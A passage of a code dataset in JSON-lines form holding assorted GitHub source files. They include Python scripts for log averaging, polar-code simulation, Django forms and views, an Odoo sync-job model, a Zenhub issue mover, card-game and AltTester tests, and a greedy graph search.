open(\"./logs/clog.txt\", 'r+')\navg2 = 0.0\nlines2 = 0.0\nfor line in file2:\n lines2 = lines2 + 1.0\n avg2 = (avg2 + float(line))\navg2 = avg2/lines2\nprint(avg2, \"for C with\", lines2, \"lines\")\n\n\nfile3 = open(\"./logs/cpplog.txt\", 'r+')\navg3 = 0.0\nlines3 = 0.0\nfor line in file3:\n lines3 = lines3 + 1.0\n avg3 = (avg3 + float(line))\navg3 = avg3/lines3\nprint(avg3, \"for C++ with\", lines3, \"lines\")\n\n\nfile4 = open(\"./logs/javalog.txt\", 'r+')\navg4 = 0.0\nlines4 = 0.0\nfor line in file4:\n lines4 = lines4 + 1.0\n avg4 = (avg4 + float(line))\navg4 = avg4/lines4\nprint(avg4, \"for Java with\", lines4, \"lines\")\n\nword = \"\"\nwhile(word.lower() != \"y\" and word.lower() != \"n\"):\n word = input(\"Do you want to wipe the previous log? [Y/N]\")\n if(word.lower() == \"y\"):\n file1.truncate(0)\n file3.truncate(0)\n file2.truncate(0)\n file4.truncate(0)\nprint(\"Done.\")\n\nfile4.close()\nfile3.close()\nfile2.close()\nfile1.close()\n","repo_name":"Aniket965/Hello-world","sub_path":"speedTester/logs/average.py","file_name":"average.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":1462,"dataset":"github-code","pt":"44"} +{"seq_id":"7073641264","text":"import encoder\nimport sc_decoder\nimport channel\nimport random\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef sc_main(N, k, total_message_bits, snr):\n error = 0\n for _ in range(total_message_bits // k):\n message = [random.randint(0, 1) for _ in range(k)]\n code, channel_states = encoder.encoder(message, N, k)\n channel_input = channel.bpsk(code)\n n0 = (10 ** (- 0.1 * snr))\n channel_output = channel.AWGN(channel_input, n0)\n recieved_message = []\n sc_decoder.decoder(channel_output, channel_states, recieved_message, N)\n # print(f'message = {message}')\n # print(f'recieved message = {recieved_message}')\n # if message == recieved_message:\n # print('yes')\n # else:\n # print(f'message = {message}')\n # print(f'recieved message = {recieved_message}')\n if recieved_message != message:\n for i in range(k):\n if recieved_message[i] != message[i]:\n error += 1\n \n return error / total_message_bits\n\n\nN, k = 256, 128\ntotal_message_bits = k * 500\n# print(sc_main(N, k, total_message_bits, 3))\n\nsnr_arr = np.arange(1, 5, 1.0)\nber_arr = np.zeros_like(snr_arr)\n\nfor i, el in enumerate(snr_arr):\n ber_arr[i] = sc_main(N, k, total_message_bits, el)\n\n# print(ber_arr)\n\n\n'''plotting'''\n\nplt.plot(snr_arr, ber_arr)\nplt.yscale('log')\nplt.axis([1, 5, 0.001, 1])\nplt.ylabel('BER')\nplt.xlabel('Eb/N0 (dB)')\nplt.title(f'BER vs SNR SC ({N}, {k})')\nplt.show()\n\n\n################# timeit code ####################\n\n# a = [-1] * 128\n# b = [1] * 128\n# print(timeit.timeit(\"g(a, b, 126)\", setup=\"from __main__ import g, a, b\", number=62500))","repo_name":"Ashish-G-A/Polar-code-simulation","sub_path":"polar_codes_main.py","file_name":"polar_codes_main.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"33520338609","text":"from django import forms\nfrom django.core.validators import validate_email\nfrom django.utils.translation import gettext_lazy as _ #for post type\nfrom django.core.exceptions import ValidationError\nfrom .models import Article\n\nBIRTH_YEAR_CHOICES = ['1980', '1981', '1982']\nFAVORITE_COLORS_CHOICES = [\n ('blue', 'Blue'),\n ('green', 'Green'),\n ('black', 'Black'),\n \n]\n\nclass NameForm(forms.Form):\n\n your_name = forms.CharField(label='Your name', max_length=100)\n subject = forms.CharField(max_length=100)\n message = forms.CharField(widget=forms.Textarea)\n sender = forms.EmailField()\n cc_myself = forms.BooleanField(required=False)\n birth_year = forms.DateField(widget=forms.SelectDateWidget(years=BIRTH_YEAR_CHOICES))\n single_color = forms.ChoiceField(required=False, choices=FAVORITE_COLORS_CHOICES)\n favorite_colors = forms.MultipleChoiceField(\n required=False,\n widget=forms.RadioSelect,\n choices=FAVORITE_COLORS_CHOICES,\n )\n comment = forms.CharField(widget=forms.TextInput(attrs={'size': '40'}))\n\n your_name.widget.attrs.update({'class': 'special'})\n\n template_name = \"form_template.html\"\n\n def validate(self, value):\n \"\"\"Check if value consists only of valid emails.\"\"\"\n # Use the parent's handling of required fields, etc.\n super().validate(value)\n for sender in value:\n validate_email(sender)\n\n def clean(self):\n cleaned_data = super().clean()\n cc_myself = cleaned_data.get(\"cc_myself\")\n subject = cleaned_data.get(\"subject\")\n\n if cc_myself and subject:\n # Only do something if both fields are valid so far.\n if \"help\" not in subject:\n raise ValidationError(\n \"Did not send for 'help' in the subject despite \"\n \"CC'ing yourself.\"\n )\n \n def send_email(self):\n # send email using the self.cleaned_data dictionary\n pass\n\nclass ArticleForm(forms.ModelForm):\n # title = forms.CharField(label='Your name', max_length=100)\n class Meta:\n model = Article\n # fields = ['title','author']\n fields = '__all__'\n localized_fields = ('publish_on',)\n widgets = {\n 'description': forms.Textarea(attrs={'cols': 80, 'rows': 20}),\n }\n labels = {\n 'title': _('Your name'),\n }\n help_texts = {\n 'title': _('Some useful help text.'),\n }\n error_messages = {\n 'title': {\n 'max_length': _(\"This writer's name is too long.\"),\n },\n }\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.fields['title'].widget.attrs.update({'class': 'special'})\n\n def clean_title(self):\n # custom validation for the title field\n pass\n\n\n","repo_name":"Subham043/django-docker","sub_path":"mysite/blogs/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"2780909504","text":"from base.constants.cache import CacheConstants\nfrom ..env import PROJECT_DIR\nfrom ..env import env\n\nCACHES = {\n \"default\": {\n \"BACKEND\": \"base.cache.RedisClusterClient\",\n \"LOCATION\": env.str(\"DEFAULT_REDIS_URL\"),\n \"TIMEOUT\": 300,\n },\n CacheConstants.CACHE_DISK_STR: {\n \"BACKEND\": \"base.cache.DiskCacheClient\",\n \"LOCATION\": f\"{PROJECT_DIR}/_disk_cache\",\n \"TIMEOUT\": 300,\n # ^-- Django setting for default timeout of each key.\n \"SHARDS\": 8,\n \"DATABASE_TIMEOUT\": 0.010, # 10 milliseconds\n # ^-- Timeout for each DjangoCache database transaction.\n \"OPTIONS\": {\"size_limit\": 2**30}, # 1 gigabyte\n },\n CacheConstants.CACHE_LOCK_STR: {\n \"BACKEND\": \"base.cache.RedisCacheClient\",\n \"LOCATION\": env.str(\"LOCK_REDIS_URL\"),\n },\n}\n","repo_name":"d54365/smorgasbord","sub_path":"smorgasbord/config/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"19574356230","text":"import transaction\n\nfrom admin.views import main_table, main_admin\nfrom dbas.database import DBDiscussionSession\nfrom dbas.database.discussion_model import User\nfrom dbas.tests.utils import construct_dummy_request, TestCaseWithConfig\n\n\nclass AdminViewTest(TestCaseWithConfig):\n def __update_user(self, nickname):\n db_user = DBDiscussionSession.query(User).filter_by(nickname=nickname).first()\n db_user.update_last_login()\n db_user.update_last_action()\n transaction.commit()\n\n def test_main_admin_no_author(self):\n request = construct_dummy_request()\n response = main_admin(request)\n self.assertIn('title', response)\n self.assertIn('project', response)\n self.assertIn('extras', response)\n self.assertIn('dashboard', response)\n\n def test_main_admin(self):\n self.config.testing_securitypolicy(userid='Tobias', permissive=True)\n self.__update_user('Tobias')\n request = construct_dummy_request()\n response = main_admin(request)\n self.assertIn('title', response)\n self.assertIn('project', response)\n self.assertIn('extras', response)\n self.assertIn('dashboard', response)\n\n def test_main_table_no_author(self):\n request = construct_dummy_request()\n response = main_table(request)\n self.assertEqual(400, response.status_code)\n\n def test_main_table_error(self):\n self.config.testing_securitypolicy(userid='Tobias', permissive=True)\n request = construct_dummy_request(matchdict={'table': 'fu'})\n response = main_table(request)\n self.assertEqual(400, response.status_code)\n\n def test_main_table(self):\n self.config.testing_securitypolicy(userid='Tobias', permissive=True)\n request = construct_dummy_request(matchdict={'table': 'User'})\n response = main_table(request)\n self.assertIn('title', response)\n self.assertIn('project', response)\n self.assertIn('extras', response)\n self.assertIsNotNone(response['table'].get('name'))\n self.assertIsNotNone(response['table'].get('has_elements'))\n self.assertIsNotNone(response['table'].get('count'))\n self.assertIsNotNone(response['table'].get('head'))\n self.assertIsNotNone(response['table'].get('row'))\n","repo_name":"hhucn/dbas","sub_path":"admin/tests/test_view.py","file_name":"test_view.py","file_ext":"py","file_size_in_byte":2306,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"44"} +{"seq_id":"15147517469","text":"from odoo import api, fields, models\nfrom odoo.tools.translate import _\n\nfrom odoo.addons.queue_job.job import DONE, ENQUEUED, FAILED, PENDING, STARTED\n\nfrom .ir_logging import LOG_CRITICAL, LOG_ERROR, LOG_WARNING\n\nDONE_WARNING = \"done_warning\"\nTRIGGER_MODEL2FIELD = {\n \"sync.trigger.cron\": \"trigger_cron_id\",\n \"sync.trigger.automation\": \"trigger_automation_id\",\n \"sync.trigger.webhook\": \"trigger_webhook_id\",\n \"sync.trigger.button\": \"trigger_button_id\",\n}\nTRIGGER_FIELDS = TRIGGER_MODEL2FIELD.values()\n\n\nclass SyncJob(models.Model):\n\n _name = \"sync.job\"\n _description = \"Sync Job\"\n _rec_name = \"trigger_name\"\n _order = \"id desc\"\n\n trigger_name = fields.Char(compute=\"_compute_trigger_name\", store=True)\n trigger_cron_id = fields.Many2one(\"sync.trigger.cron\", readonly=True)\n trigger_automation_id = fields.Many2one(\"sync.trigger.automation\", readonly=True)\n trigger_webhook_id = fields.Many2one(\"sync.trigger.webhook\", readonly=True)\n trigger_button_id = fields.Many2one(\"sync.trigger.button\", readonly=True)\n task_id = fields.Many2one(\"sync.task\", compute=\"_compute_sync_task_id\", store=True)\n project_id = fields.Many2one(\n \"sync.project\", related=\"task_id.project_id\", readonly=True\n )\n parent_job_id = fields.Many2one(\"sync.job\", readonly=True)\n job_ids = fields.One2many(\"sync.job\", \"parent_job_id\", \"Sub jobs\", readonly=True)\n log_ids = fields.One2many(\"ir.logging\", \"sync_job_id\", readonly=True)\n log_count = fields.Integer(compute=\"_compute_log_count\")\n queue_job_id = fields.Many2one(\"queue.job\", string=\"Queue Job\", readonly=True)\n queue_job_state = fields.Selection(\n related=\"queue_job_id.state\", readonly=True, string=\"Queue Job State\"\n )\n function = fields.Char(string=\"Task Function\")\n func_string = fields.Char(\n related=\"queue_job_id.func_string\", readonly=True, string=\"Function\"\n )\n retry = fields.Integer(related=\"queue_job_id.retry\", readonly=True)\n max_retries_str = fields.Char(compute=\"_compute_max_retries_str\")\n state = fields.Selection(\n [\n (PENDING, \"Pending\"),\n (ENQUEUED, \"Enqueued\"),\n (STARTED, \"Started\"),\n (DONE, \"Done\"),\n (DONE_WARNING, \"Done With Warnings\"),\n (FAILED, \"Failed\"),\n ],\n compute=\"_compute_state\",\n )\n in_progress = fields.Boolean(\n compute=\"_compute_state\",\n )\n\n @api.depends(\"queue_job_id.max_retries\")\n def _compute_max_retries_str(self):\n for r in self:\n max_retries = r.queue_job_id.max_retries\n if not max_retries:\n r.max_retries_str = _(\"infinity\")\n else:\n r.max_retries_str = str(max_retries)\n\n @api.depends(\"queue_job_id.state\", \"job_ids.queue_job_id.state\", \"log_ids.level\")\n def _compute_state(self):\n for r in self:\n jobs = r + r.job_ids\n states = [q.state for q in jobs.mapped(\"queue_job_id\")]\n levels = {log.level for log in jobs.mapped(\"log_ids\")}\n computed_state = DONE\n has_errors = any(lev in [LOG_CRITICAL, LOG_ERROR] for lev in levels)\n has_warnings = any(lev == LOG_WARNING for lev in levels)\n for s in [FAILED, STARTED, ENQUEUED, PENDING]:\n if any(s == ss for ss in states):\n computed_state = s\n break\n if computed_state == DONE and has_errors:\n computed_state = FAILED\n elif computed_state == DONE and has_warnings:\n computed_state = DONE_WARNING\n\n r.state = computed_state\n r.in_progress = any(s in [PENDING, ENQUEUED, STARTED] for s in states)\n\n @api.depends(\"log_ids\")\n def _compute_log_count(self):\n for r in self:\n r.log_count = len(r.log_ids)\n\n @api.depends(\"parent_job_id\", *TRIGGER_FIELDS)\n def _compute_sync_task_id(self):\n for r in self:\n if r.parent_job_id:\n r.task_id = r.parent_job_id.task_id\n for f in TRIGGER_FIELDS:\n obj = getattr(r, f)\n if obj:\n r.task_id = obj.sync_task_id\n break\n\n @api.depends(*TRIGGER_FIELDS)\n def _compute_trigger_name(self):\n for r in self:\n if r.parent_job_id:\n r.trigger_name = (r.parent_job_id.trigger_name or \"\") + \".\" + r.function\n continue\n for f in TRIGGER_FIELDS:\n t = getattr(r, f)\n if t:\n r.trigger_name = t.trigger_name\n break\n\n def create_trigger_job(self, trigger):\n return self.create(\n {\n TRIGGER_MODEL2FIELD[trigger._name]: trigger.id,\n \"function\": trigger._sync_handler,\n }\n )\n\n def refresh_button(self):\n # magic empty method to refresh form content\n pass\n\n def requeue_button(self):\n self.queue_job_id.requeue()\n","repo_name":"AbdulrhmanGad/zania","sub_path":"sync/models/sync_job.py","file_name":"sync_job.py","file_ext":"py","file_size_in_byte":5018,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"37228487377","text":"import argparse\nfrom python.config.logging_config import logging\n\nfrom python.services.zenhub_service import ZenhubService\n\n\ndef get_issues(zenhub: ZenhubService, label, from_pipeline: str) -> list | Exception:\n from_pipeline_id = zenhub.get_pipeline_id(from_pipeline)\n if from_pipeline_id is None:\n logging.error(\n f\"Failed to get pipeline ID for pipeline {from_pipeline}\")\n raise ValueError\n\n return zenhub.search_issues_by_label(from_pipeline_id, label)\n\n\ndef move_issues(zenhub: ZenhubService, issues_to_move, to_pipeline):\n to_pipeline_id = zenhub.get_pipeline_id(to_pipeline)\n if to_pipeline_id is None:\n logging.error(f\"Failed to get pipeline ID for pipeline {to_pipeline}\")\n raise ValueError\n\n for issue in issues_to_move:\n logging.info(f\"Moving issue {issue['id']} to pipeline {to_pipeline}\")\n success = zenhub.move_issue_to_pipeline(issue['id'], to_pipeline_id)\n if not success:\n logging.error(\n f\"Failed to move issue {issue['id']} to pipeline {to_pipeline}\")\n raise ValueError\n\n\ndef add_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--api_token\",\n type=str,\n required=True,\n help=\"The zenhub api token to use.\",\n )\n\n parser.add_argument(\n \"--repo_id\",\n type=int,\n default=223385041, # This is the ID of the \"operations-engineering\" repo\n help=\"The ID of a GitHub repository that exists in your Zenhub workspace.\",\n )\n\n parser.add_argument(\n \"--label\",\n type=str,\n default=\"dependencies\",\n help=\"The label attached to the GitHub issue.\",\n )\n\n parser.add_argument(\n \"--from_pipeline\",\n type=str,\n default=\"New Issues\",\n help=\"The name of the pipeline to move the issue from.\",\n )\n\n parser.add_argument(\n \"--to_pipeline\",\n type=str,\n default=\"Refined and Ready\",\n help=\"The name of the pipeline to move the issue to.\",\n )\n\n return parser.parse_args()\n\n\ndef main():\n args = add_arguments()\n\n zenhub = ZenhubService(args.api_token)\n try:\n zenhub.workspace_id = zenhub.get_workspace_id_from_repo(args.repo_id)\n except Exception as e:\n return e\n\n try:\n issues = get_issues(zenhub, args.label, args.from_pipeline)\n except Exception as e:\n return e\n\n if len(issues) == 0:\n logging.warning(\n f\"No issues found with label {args.label}, closing script.\")\n return\n\n try:\n move_issues(zenhub, issues, args.to_pipeline)\n except Exception as e:\n return e\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ministryofjustice/operations-engineering","sub_path":"python/scripts/move_dependabot_tickets.py","file_name":"move_dependabot_tickets.py","file_ext":"py","file_size_in_byte":2704,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"44"} +{"seq_id":"21224340448","text":"from unittest import TestCase\nfrom unittest.mock import patch\nfrom game import Game, Card, UnauthorisedNumberOfDecksException, UnknownMatchTypeException\n\nclass Test(TestCase):\n\n def test_negative_number_of_cards(self):\n # checks that the constructor throws an exception if we have a negative number in the place of numberOfDecks\n with self.assertRaises(UnauthorisedNumberOfDecksException):\n game = Game(-1,\"values\")\n\n def test_float_number_of_cards(self):\n # checks that the constructor throws an exception if we have a float number in the place of numberOfDecks\n with self.assertRaises(UnauthorisedNumberOfDecksException):\n game = Game(1.5,\"values\")\n\n def test_string_number_of_cards(self):\n # checks that the constructor throws an exception if we have a string in the place of numberOfDecks\n with self.assertRaises(UnauthorisedNumberOfDecksException):\n game = Game(\"1.5\",\"values\")\n\n def test_negative_unknown_match(self):\n # checks that the constructor throws an exception if we have an unknown match type\n with self.assertRaises(UnknownMatchTypeException):\n game = Game(1,\"value\")\n\n def test_pick_a_card(self):\n # tests that the card that was picked is in the deck\n game = Game(1,\"values\")\n result = game.pickCard()\n self.assertIn(result,game.deck)\n\n @patch(\"game.Game.pickCard\")\n def test_pick_a_card_from_deck(self, pickcard):\n # tests that after all cards of a type are taken out of the deck, you can't pick the same card again\n pickcard.return_value = Card(\"king\",\"hearts\")\n game = Game(2, \"values\")\n game.addToPile(Card(\"king\",\"hearts\"))\n game.addToPile(Card(\"king\",\"hearts\"))\n self.assertEqual(game.pile, 2)\n card = game.pickCard()\n game.addToPile(card)\n self.assertEqual(game.pile, 2)\n\n def test_add_to_pile(self):\n # checks that a card has been added to the pile\n game = Game(1, \"values\")\n game.addToPile(Card(\"king\",\"hearts\"))\n self.assertEqual(game.pile,1)\n\n def test_pick_player(self):\n # tests that the random number generator has picked a valid player\n game = Game(1, \"values\")\n player = game.pickPlayer([\"A\",\"B\"])\n self.assertIn(player,[\"A\",\"B\"])\n\n def test_take_pile(self):\n # checks that after a player wins a round, the pile gets added to their score\n game = Game(1,\"values\")\n game.addToPile(Card(\"king\",\"hearts\"))\n game.addToPile(Card(\"3\",\"clubs\"))\n game.takePile(\"A\")\n self.assertEqual(game.scores,[2,0])\n\n def test_match(self):\n # checks that the match functions work as expected\n game = Game(1,\"suits\")\n cards = [Card(\"king\",\"hearts\"),Card(\"3\",\"hearts\")]\n self.assertEqual(game.match(cards),True)\n game = Game(1, \"values\")\n cards = [Card(\"king\", \"hearts\"), Card(\"3\", \"hearts\")]\n self.assertEqual(game.match(cards), False)\n game = Game(1, \"values\")\n cards = [Card(\"king\", \"hearts\"), Card(\"king\", \"clubs\")]\n self.assertEqual(game.match(cards), True)\n game = Game(1, \"values\")\n cards = [Card(\"king\", \"hearts\"), Card(\"queen\", \"clubs\")]\n self.assertEqual(game.match(cards), False)\n\n def test_get_cards_for_players(self):\n # checks that valid cards were picked for each player and the correct number of cards were added to the pile\n game = Game(1, \"values\")\n cards = game.getCardsForPlayers()\n self.assertNotIn(cards[0],game.deck)\n self.assertNotIn(cards[1], game.deck)\n self.assertIn(cards[0].suit,game.suits)\n self.assertIn(cards[1].suit, game.suits)\n self.assertIn(cards[0].value, game.values)\n self.assertIn(cards[1].value, game.values)\n self.assertEquals(game.pile, 2)\n\n def test_compare_cards_and_pick_player(self):\n # checks that, given two cards that have been picked out, the right score gets calculated\n cards = [Card(\"ace\",\"hearts\"),Card(\"ace\",\"clubs\")]\n game = Game(1, \"values\")\n game.pile = 2\n game.compareCardsAndPickWinner(cards)\n self.assertEquals(set(game.scores),set([2,0]))\n\n @patch(\"game.Game.pickPlayer\")\n def test_play_draw(self, player):\n # checks that after a number of rounds have been played, the draw condition can be achieved\n player.return_value = \"A\"\n game = Game(2, \"values\")\n game.deck = {\n Card(\"ace\",\"spades\"): 2,\n }\n game.pile = 0\n game.scores =[50,52]\n self.assertEquals(game.play(),\"DRAW\")\n\n @patch(\"game.Game.pickPlayer\")\n def test_play_A_wins(self, player):\n # checks that if player A wins, the right output gets returned\n player.return_value = \"A\"\n game = Game(2, \"values\")\n game.deck = {\n Card(\"ace\", \"spades\"): 2,\n }\n game.pile = 0\n game.scores = [52, 48]\n self.assertEquals(game.play(), \"A\")\n\n @patch(\"game.Game.pickPlayer\")\n def test_play_B_wins(self, player):\n # checks that if player B wins, then the right output gets returned\n player.return_value = \"B\"\n game = Game(2, \"suits\")\n game.deck = {\n Card(\"ace\", \"spades\"): 2,\n Card(\"2\", \"spades\"): 2,\n }\n game.pile = 0\n game.scores = [48, 48]\n self.assertEquals(game.play(), \"B\")\n","repo_name":"alinasuiu/match","sub_path":"tests/test_game.py","file_name":"test_game.py","file_ext":"py","file_size_in_byte":5451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"18068800887","text":"# Busca Gulosa (Greedy Search):\n# A busca gulosa escolhe o próximo nó que parece mais promissor com base em uma heurística. Pode não levar à solução ótima, mas é rápida e eficiente.\n\ndef greedy_search(graph, start_node, target_node, heuristic):\n priority_queue = [(heuristic[start_node], start_node)]\n visited = set()\n\n while priority_queue:\n cost, current_node = priority_queue.pop(0)\n\n if current_node == target_node:\n return visited\n\n visited.add(current_node)\n\n for neighbor in graph[current_node]:\n if neighbor not in visited:\n priority_queue.append((heuristic[neighbor], neighbor))\n priority_queue.sort()\n\n return visited\n\n\nheuristic = {\n 'A': 2,\n 'B': 3,\n 'C': 1,\n 'D': 4,\n 'E': 5,\n 'F': 0\n}\n\ngraph = {\n 'A': ['B', 'C'],\n 'B': ['D', 'E'],\n 'C': ['F'],\n 'D': [],\n 'E': ['F'],\n 'F': []\n}\n\nstart_node = 'A'\ntarget_node = 'F'\n\nresult = greedy_search(graph, start_node, target_node, heuristic)\nprint(f'Nós visitados pela busca gulosa: {result}')\n","repo_name":"pescador95/grafos","sub_path":"nao-ponderados/busca gulosa.py","file_name":"busca gulosa.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"1142363428","text":"# region IMPORT\nimport functools\nfrom .logger import Logger\n\n# endregion IMPORT\n\n\nclass ErrorHandler:\n def generic_errorhandler(func):\n \"\"\"\n - Handles Generic Errors and returns '-'\n \"\"\"\n\n printError = lambda e: Logger.print_as_error(cat=\"err-r\", message=f\"ERROR: {e.__class__.__name__.upper()} - {e} \")\n\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n try:\n result = func(*args, **kwargs)\n return result\n\n except Exception as e:\n printError(e)\n return \"-\"\n\n return wrapper\n","repo_name":"sree-r-one/farm-stack-introduction","sub_path":"backend/utils/errorhandler.py","file_name":"errorhandler.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"33564255549","text":"from django.http.response import HttpResponse\nfrom accounts.views import train\nfrom accounts.form import TrainDetailForm\nfrom accounts.models import TrainDetail\nfrom django.shortcuts import redirect, render\n\n\ndef create (request):\n if request.method ==\"GET\":\n train=TrainDetail()\n train.Train_id = request.GET['Train_id']\n train.Train_name=request.GET['Train_name']\n train.Route_id=request.GET['Route_id']\n train.Arrival_time = request.GET['Arrival_time']\n train.Departure_time = request.GET['Departure_time']\n train.save()\n return redirect('train')\n else: \n form =TrainDetailForm() \n return render(request,'accounts/trainIDDetails.html',{'form':form})\ndef summa(request):\n return render(request,'accounts/traincreate.html')\n\ndef edit(request,id):\n return render(request,'accounts/trainedit.html',{'id':id})\n\ndef update(request,id):\n object=TrainDetail.objects.get(id=id)\n object.Train_id = request.GET['Train_id']\n object.Train_name=request.GET['Train_name']\n object.Route_id=request.GET['Route_id']\n object.Arrival_time = request.GET['Arrival_time']\n object.Departure_time = request.GET['Departure_time']\n object.save()\n return redirect('train')\n\ndef delete(request,id): \n TrainDetail.objects.filter(id=id).delete()\n return redirect('train')\n","repo_name":"SibiChakravarthy7311/RailwayReservation","sub_path":"accounts/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"73843098371","text":"from django.test import TestCase\nfrom django.db import transaction\nfrom django.db.utils import IntegrityError\n\nfrom django.contrib.auth import get_user_model\n\nfrom .models import Post\n\n# Create your tests here.\n\nclass PostTest(TestCase):\n\n\tdef test_create_post(self):\n\t\tpost = Post()\n\t\tuser = get_user_model()\n\n\t\t#post['userid'] = 'kim1124'\n\t\tpost['content'] = '테스트 케이스로 작성된 글입니다.'\n\t\tpost['locked'] = False\n\t\tpost['hidden'] = False\n\n\t\twith transaction.atomic():\n\t\t\twith self.assertRaises(IntegrityError):\n\t\t\t\tpost.save()\n\n\t\tself.assertIsNone(post.pk)\n\n\t\tpost.save()\n\t\tself.assertIsNotNone(post.pk)","repo_name":"kim1124/Projects","sub_path":"Django-Web/FastCampus/day5_review/pystagram/photos/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"35291151","text":"import time\n\nimport pytest\n\nfrom .utils import Scenes\nfrom alttester import By, AltKeyCode\n\n\nclass TestScene05:\n\n @pytest.fixture(autouse=True)\n def setup(self, altdriver):\n self.altdriver = altdriver\n self.altdriver.reset_input()\n self.altdriver.load_scene(Scenes.Scene05)\n\n def test_movement_cube(self):\n cube = self.altdriver.find_object(By.NAME, \"Player1\")\n initial_position = (cube.worldX, cube.worldY, cube.worldZ)\n\n self.altdriver.scroll(speed_vertical=30, duration=0.1, wait=False)\n self.altdriver.press_key(AltKeyCode.K, power=1, duration=0.1, wait=False)\n\n self.altdriver.press_key(AltKeyCode.O, power=1, duration=0.1)\n cube = self.altdriver.find_object(By.NAME, \"Player1\")\n final_position = (cube.worldX, cube.worldY, cube.worldZ)\n\n assert initial_position != final_position\n\n def test_camera_movement(self):\n cube = self.altdriver.find_object(By.NAME, \"Player1\")\n initial_position = (cube.worldX, cube.worldY, cube.worldY)\n\n self.altdriver.press_key(AltKeyCode.W, power=1, duration=0.1, wait=False)\n # time.sleep(2)\n\n cube = self.altdriver.find_object(By.NAME, \"Player1\")\n final_position = (cube.worldX, cube.worldY, cube.worldY)\n\n assert initial_position != final_position\n\n def test_update_altObject(self):\n\n cube = self.altdriver.find_object(By.NAME, \"Player1\")\n initial_position_z = cube.worldZ\n\n self.altdriver.press_key(AltKeyCode.W, power=1, duration=0.1, wait=False)\n time.sleep(5)\n\n assert initial_position_z != cube.update_object().worldZ\n\n def test_creating_stars(self):\n stars = self.altdriver.find_objects_which_contain(By.NAME, \"Star\", By.NAME, \"Player2\")\n assert len(stars) == 1\n\n self.altdriver.find_objects_which_contain(By.NAME, \"Player\", By.NAME, \"Player2\")\n pressing_point_1 = self.altdriver.find_object(By.NAME, \"PressingPoint1\", By.NAME, \"Player2\")\n\n self.altdriver.move_mouse(pressing_point_1.get_screen_position(), duration=0.1, wait=False)\n time.sleep(0.1)\n\n self.altdriver.press_key(AltKeyCode.Mouse0, power=1, duration=0.1, wait=False)\n pressing_point_2 = self.altdriver.find_object(By.NAME, \"PressingPoint2\", By.NAME, \"Player2\")\n self.altdriver.move_mouse(pressing_point_2.get_screen_position(), duration=0.1)\n self.altdriver.press_key(AltKeyCode.Mouse0, power=1, duration=0.1, wait=False)\n time.sleep(0.1)\n\n stars = self.altdriver.find_objects_which_contain(By.NAME, \"Star\")\n assert len(stars) == 3\n\n def test_power_joystick(self):\n button_names = [\"Horizontal\", \"Vertical\"]\n keys_to_press = [AltKeyCode.D, AltKeyCode.W]\n\n axis_name = self.altdriver.find_object(By.NAME, \"AxisName\")\n axis_value = self.altdriver.find_object(By.NAME, \"AxisValue\")\n\n for button_name, key in zip(button_names, keys_to_press):\n self.altdriver.press_key(key, power=0.5, duration=1)\n\n assert axis_value.get_text() == \"0.5\"\n assert axis_name.get_text() == button_name\n\n def test_scroll(self):\n player2 = self.altdriver.find_object(By.NAME, \"Player2\")\n cube_initial_position = [player2.worldX, player2.worldY, player2.worldY]\n self.altdriver.scroll(4, duration=1, wait=False)\n time.sleep(1)\n\n player2 = self.altdriver.find_object(By.NAME, \"Player2\")\n cube_final_position = [player2.worldX, player2.worldY, player2.worldY]\n assert cube_initial_position != cube_final_position\n\n def test_scroll_and_wait(self):\n player2 = self.altdriver.find_object(By.NAME, \"Player2\")\n cube_initial_position = [player2.worldX, player2.worldY, player2.worldY]\n self.altdriver.scroll(4, duration=0.3)\n\n player2 = self.altdriver.find_object(By.NAME, \"Player2\")\n cube_final_position = [player2.worldX, player2.worldY, player2.worldY]\n assert cube_initial_position != cube_final_position\n\n def test_key_down_and_key_up(self):\n self.altdriver.key_down(AltKeyCode.A)\n\n last_key_down = self.altdriver.find_object(By.NAME, \"LastKeyDownValue\")\n last_key_press = self.altdriver.find_object(By.NAME, \"LastKeyPressedValue\")\n\n assert last_key_down.get_text() == \"97\"\n assert last_key_press.get_text() == \"97\"\n\n self.altdriver.key_up(AltKeyCode.A)\n last_key_up = self.altdriver.find_object(By.NAME, \"LastKeyUpValue\")\n\n assert last_key_up.get_text() == \"97\"\n","repo_name":"alttester/AltTester-Unity-SDK","sub_path":"Bindings~/python/tests/integration/test_scene05.py","file_name":"test_scene05.py","file_ext":"py","file_size_in_byte":4537,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"44"} +{"seq_id":"14754026957","text":"import collections\n\n\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left, self.right = None, None\n\n\nclass Solution: # 48ms\n def invertTree(self, root: TreeNode) -> TreeNode:\n \"\"\"\n 关键在哪呢??先翻转,再遍历每个节点。\n \"\"\"\n # 001 terminator\n if root is None:\n return None\n # 002 handle current level\n 